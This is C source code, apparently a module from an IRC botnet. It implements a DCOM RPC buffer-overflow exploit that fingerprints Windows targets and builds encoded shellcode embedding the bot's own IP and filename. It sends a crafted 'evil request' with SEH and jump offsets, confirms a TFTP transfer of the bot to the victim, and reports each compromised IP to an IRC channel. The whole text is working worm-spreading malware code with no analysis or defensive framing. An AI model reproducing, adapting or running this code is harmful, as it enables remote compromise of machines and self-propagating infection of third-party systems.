DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename) { DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename); if (RNS0TerminatedShellcodeSize > buffersize) return 0; if (RNS0TerminatedShellcodeSize > 65535) return 0; char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257); DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename); RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize); free(Shellcode); return RNS0TerminatedShellcodeSize; }
BOOL dcom2(EXINFO exinfo) { char sendbuf[IRCLINE],*pTemp; char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096]; int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0; int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename); if (!iShellSize) return 0; iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize = iPos; iPos = 0; pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; // connect with target IP int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr==-1) { // connect failed, exit fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); // Check for DCE_PKT_BINDACK if (szRecvBuf[2] != DCE_PKT_BINDACK) { fclosesocket(sSocket); return FALSE; } // send evil request if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } // read reply frecv(sSocket, szRecvBuf, 4096, 0); if (szRecvBuf[2] == DCE_PKT_FAULT) { fclosesocket(sSocket); return FALSE; } fclosesocket(sSocket); sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }